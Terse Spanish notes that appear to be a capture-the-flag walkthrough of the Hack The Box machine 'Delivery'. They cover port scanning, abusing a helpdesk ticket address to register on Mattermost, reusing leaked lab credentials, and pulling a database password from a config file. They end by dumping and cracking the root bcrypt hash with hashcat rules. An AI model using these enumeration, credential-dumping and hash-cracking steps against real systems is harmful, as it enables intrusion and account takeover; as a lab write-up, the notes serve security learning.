nmap -A -p- -oA sink 10.129.151.232 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sink 10.129.151.232

nmap -sU -O -p- -oA sink-udp 10.129.151.232

nikto -h 10.129.151.232:80

whatweb http://10.129.151.232

http://10.129.151.232/:8065/login

http://helpdesk.delivery.htb

Creamos un tiquete

Adquirimos un tiquete 2494997 y tratamos de ver el estatus de nuestro tiquete.

Ahora nos vamos a mattermost Y metemos la siguiente informacion.

Ahora vemos la siguiente informacion. copiamos el url. Por ejemplo el que empieza asi: http://delivery.htb:8065/do_verify_email?token=...

http://delivery.htb:8065/select_team

Ahora podemos ver las credenciales:

Credenciales-> maildeliverer:Youve_G0t_Mail!

sh maildeliver@delivery.htb

id

sudo -l

cd /

find \-perm -4000 2>/dev/null

getcap -r 2>/dev/null

uname -a

lsb_release -a

Creamos un archivo pwd con el siguiente texto PleaseSubscribe!

hashcat --stdout pwd -r /usr/share/hashcat/rules/best64.rule

![[Pasted image 20220204185313.png]]

hashcat --stdout pwd -r /usr/share/hashcat/rules/best64.rule > passwords

cat /etc/sshd_config | grep -i permit_root_login

cat /etc/sshd_config | grep -i root

git clone https://github.com/hemp3l/sucrack

cd sucrack

./configure

make

cat /opt/mattermost/config/config.json | grep DataSource

mysql -umuser -pCrack_The_MM_Admin_PW

use mattermost

select Username,Password,Email from Users where Username="root"

hashcat -a 0 -m 3200 hash dict -r /usr/share/hashcat/rules/best64.rule

root:PleaseSubscribe!21